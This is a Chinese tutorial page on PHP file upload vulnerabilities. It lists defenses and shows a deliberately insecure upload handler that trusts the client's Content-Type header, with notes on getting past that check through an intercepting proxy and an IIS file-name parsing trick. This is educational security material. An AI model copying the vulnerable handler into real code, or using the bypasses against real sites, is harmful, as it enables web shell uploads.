ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、视频、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
# 文件上传漏洞 审计函数:move\_uploaded\_file 超全局变量$\_FILES 可能造成漏洞的原因: 一:后缀名是图片格式 二:前缀名不能是外部提交的 三:上传的目录不可以是获取外部提交的路径 1.asp;/1213.asp.jpg 防御 1. 使用白名单方式检测文件后缀 2. 上传之后按时间能算法生成文件名称 3. 上传目录脚本文件不可执行 4. 注意%00 截 5. Content-Type 验证 ``` <pre class="calibre10">``` <span class="token1"><</span>form action<span class="token1">=</span><span class="token2">""</span> method<span class="token1">=</span><span class="token2">"post"</span> autocomplete<span class="token1">=</span><span class="token2">"off"</span> enctype<span class="token1">=</span><span class="token2">"multipart/form-data"</span><span class="token1">></span> <span class="token1"><</span>input type<span class="token1">=</span><span class="token2">"file"</span> name<span class="token1">=</span><span class="token2">"uploadfile"</span><span class="token1">></span> <span class="token1"><</span>input type<span class="token1">=</span><span class="token2">"submit"</span> name<span class="token1">=</span><span class="token2">"upload"</span> value<span class="token1">=</span><span class="token2">"确定上传"</span><span class="token1">></span> <span class="token1"><</span><span class="token1">/</span>form<span class="token1">></span> <span class="token1"><</span><span class="token1">?</span>php <span class="token4">var_export</span><span class="token3">(</span>$_FILES<span class="token3">)</span><span class="token3">;</span> <span class="token">//结果:</span> array <span class="token3">(</span> <span class="token2">'uploadfile'</span> <span class="token1">=</span><span class="token1">></span> array <span class="token3">(</span> <span class="token2">'name'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'favicon.ico'</span><span class="token3">,</span> <span class="token2">'type'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'image/x-icon'</span><span class="token3">,</span> <span class="token2">'tmp_name'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'C:\\Windows\\phpD9D.tmp'</span><span class="token3">,</span> <span class="token2">'error'</span> <span class="token1">=</span><span class="token1">></span> <span class="token6">0</span><span class="token3">,</span> <span class="token2">'size'</span> <span class="token1">=</span><span class="token1">></span> <span class="token6">16958</span><span class="token3">,</span> <span class="token3">)</span><span class="token3">,</span> <span class="token3">)</span> array <span class="token3">(</span> <span class="token2">'uploadfile'</span> <span class="token1">=</span><span class="token1">></span> array <span class="token3">(</span> <span class="token2">'name'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'哈哈哈.jpeg'</span><span class="token3">,</span> <span class="token2">'type'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'image/jpeg'</span><span class="token3">,</span> <span class="token2">'tmp_name'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'C:\\Windows\\php881B.tmp'</span><span class="token3">,</span> <span class="token2">'error'</span> <span class="token1">=</span><span class="token1">></span> <span class="token6">0</span><span class="token3">,</span> <span class="token2">'size'</span> <span class="token1">=</span><span class="token1">></span> <span class="token6">39521</span><span class="token3">,</span> <span class="token3">)</span><span class="token3">,</span> <span class="token3">)</span> <span class="token">//.php后缀时</span> array <span class="token3">(</span> <span class="token2">'uploadfile'</span> <span class="token1">=</span><span class="token1">></span> array <span class="token3">(</span> <span class="token2">'name'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'test.php'</span><span class="token3">,</span> <span class="token2">'type'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'application/octet-stream'</span><span class="token3">,</span><span class="token">//Content-type</span> <span class="token2">'tmp_name'</span> <span class="token1">=</span><span class="token1">></span> <span class="token2">'C:\\Windows\\php3452.tmp'</span><span class="token3">,</span> <span class="token2">'error'</span> <span class="token1">=</span><span class="token1">></span> <span class="token6">0</span><span class="token3">,</span> <span class="token2">'size'</span> <span class="token1">=</span><span class="token1">></span> <span class="token6">1225</span><span class="token3">,</span> <span class="token3">)</span><span class="token3">,</span> <span class="token3">)</span> <span class="token">//可以使用抓包软件(fiddle、wireshark、burpLoader)拦截请求修改Content-type逮到绕过Content-type的限制</span> ``` ``` [telnet模拟get、post请求](telnetMo%20Ni%20get%2c%20postQing%20Qiu.html) 上传漏洞绕过Content-type ``` <pre class="calibre17">``` <span class="token1"><</span><span class="token1">?</span>php <span class="token4">header</span><span class="token3">(</span><span class="token2">"Content-type: text/html; charset=utf-8"</span><span class="token3">)</span><span class="token3">;</span> <span class="token5">if</span> <span class="token3">(</span><span class="token4">isset</span><span class="token3">(</span>$_POST<span class="token3">[</span><span class="token2">'upload'</span><span class="token3">]</span><span class="token3">)</span><span class="token1">&&</span><span class="token1">!</span><span class="token4">empty</span><span class="token3">(</span>$_POST<span class="token3">[</span><span class="token2">'upload'</span><span class="token3">]</span><span class="token3">)</span><span class="token3">)</span> <span class="token3">{</span> <span class="token5">if</span> <span class="token3">(</span>$_FILES<span class="token3">[</span><span class="token2">'uploadfile'</span><span class="token3">]</span><span class="token3">[</span><span class="token2">'type'</span><span class="token3">]</span><span class="token1">!=</span><span class="token2">'image/jpeg'</span><span class="token3">)</span> <span class="token3">{</span> <span class="token">//这里时可以串改的</span> <span class="token4">exit</span><span class="token3">(</span><span class="token2">'error:上传文件不是正确图像'</span><span class="token3">)</span><span class="token3">;</span> <span class="token3">}</span><span class="token5">else</span><span class="token3">{</span> $filename<span class="token1">=</span><span class="token4">iconv</span><span class="token3">(</span><span class="token2">'utf-8'</span><span class="token3">,</span><span class="token2">'gb2312'</span><span class="token3">,</span>$_FILES<span class="token3">[</span><span class="token2">'uploadfile'</span><span class="token3">]</span><span class="token3">[</span><span class="token2">'name'</span><span class="token3">]</span><span class="token3">)</span><span class="token3">;</span> $upfile<span class="token1">=</span><span class="token2">"./upfile"</span><span class="token3">.</span><span class="token2">'/'</span><span class="token3">.</span><span class="token4">rand</span><span class="token3">(</span><span class="token6">1</span><span class="token3">,</span><span class="token6">5</span><span class="token3">)</span><span class="token3">.</span>$filename<span class="token3">;</span> <span class="token5">if</span> <span class="token3">(</span><span class="token4">is_uploaded_file</span><span class="token3">(</span>$_FILES<span class="token3">[</span><span class="token2">'uploadfile'</span><span class="token3">]</span><span class="token3">[</span><span class="token2">'tmp_name'</span><span class="token3">]</span><span class="token3">)</span><span class="token3">)</span> <span class="token3">{</span> <span class="token5">if</span> <span class="token3">(</span><span class="token1">!</span><span class="token4">move_uploaded_file</span><span class="token3">(</span>$_FILES<span class="token3">[</span><span class="token2">'uploadfile'</span><span class="token3">]</span><span class="token3">[</span><span class="token2">'tmp_name'</span><span class="token3">]</span><span class="token3">,</span>$upfile<span class="token3">)</span><span class="token3">)</span> <span class="token3">{</span> <span class="token4">exit</span><span class="token3">(</span><span class="token2">'移动文件失败'</span><span class="token3">)</span><span class="token3">;</span> <span class="token3">}</span><span class="token5">else</span><span class="token3">{</span> echo <span class="token2">'上传成功,路径是:'</span><span class="token3">.</span>$upfile<span class="token3">;</span> <span class="token3">}</span> <span class="token3">}</span> <span class="token3">}</span> <span class="token3">}</span> <span class="token1">?</span><span class="token1">></span> <span class="token1"><</span><span class="token1">!</span>DOCTYPE html<span class="token1">></span> <span class="token1"><</span>html lang<span class="token1">=</span><span class="token2">"zh-cn"</span><span class="token1">></span> <span class="token1"><</span>head<span class="token1">></span> <span class="token1"><</span>meta charset<span class="token1">=</span><span class="token2">"utf-8"</span><span class="token1">></span> <span class="token1"><</span>title<span class="token1">></span>服务端验证绕过<span class="token3">(</span>Content<span class="token1">-</span>Type绕过<span class="token3">)</span><span class="token1"><</span><span class="token1">/</span>title<span class="token1">></span> <span class="token1"><</span><span class="token1">!</span><span class="token1">--</span> 优先使用 IE 最新版本和 Chrome <span class="token1">--</span><span class="token1">></span> <span class="token1"><</span>meta http<span class="token1">-</span>equiv<span class="token1">=</span><span class="token2">"X-UA-Compatible"</span> content<span class="token1">=</span><span class="token2">"IE=edge,chrome=1"</span> <span class="token1">/</span><span class="token1">></span> <span class="token1"><</span>meta http<span class="token1">-</span>equiv<span class="token1">=</span><span class="token2">"Content-Type"</span> content<span class="token1">=</span><span class="token2">"text/html; charset=utf-8"</span> <span class="token1">/</span><span class="token1">></span> <span class="token1"><</span><span class="token1">/</span>head<span class="token1">></span> <span class="token1"><</span>body<span class="token1">></span> <span class="token1"><</span>form action<span class="token1">=</span><span class="token2">""</span> method<span class="token1">=</span><span class="token2">"post"</span> autocomplete<span class="token1">=</span><span class="token2">"off"</span> enctype<span class="token1">=</span><span class="token2">"multipart/form-data"</span><span class="token1">></span> <span class="token1"><</span>input type<span class="token1">=</span><span class="token2">"file"</span> name<span class="token1">=</span><span class="token2">"uploadfile"</span><span class="token1">></span> <span class="token1"><</span>input type<span class="token1">=</span><span class="token2">"submit"</span> name<span class="token1">=</span><span class="token2">"upload"</span> value<span class="token1">=</span><span class="token2">"确定上传"</span><span class="token1">></span> <span class="token1"><</span><span class="token1">/</span>form<span class="token1">></span> <span class="token1"><</span><span class="token1">/</span>body<span class="token1">></span> <span class="token1"><</span><span class="token1">/</span>html<span class="token1">></span> ``` ```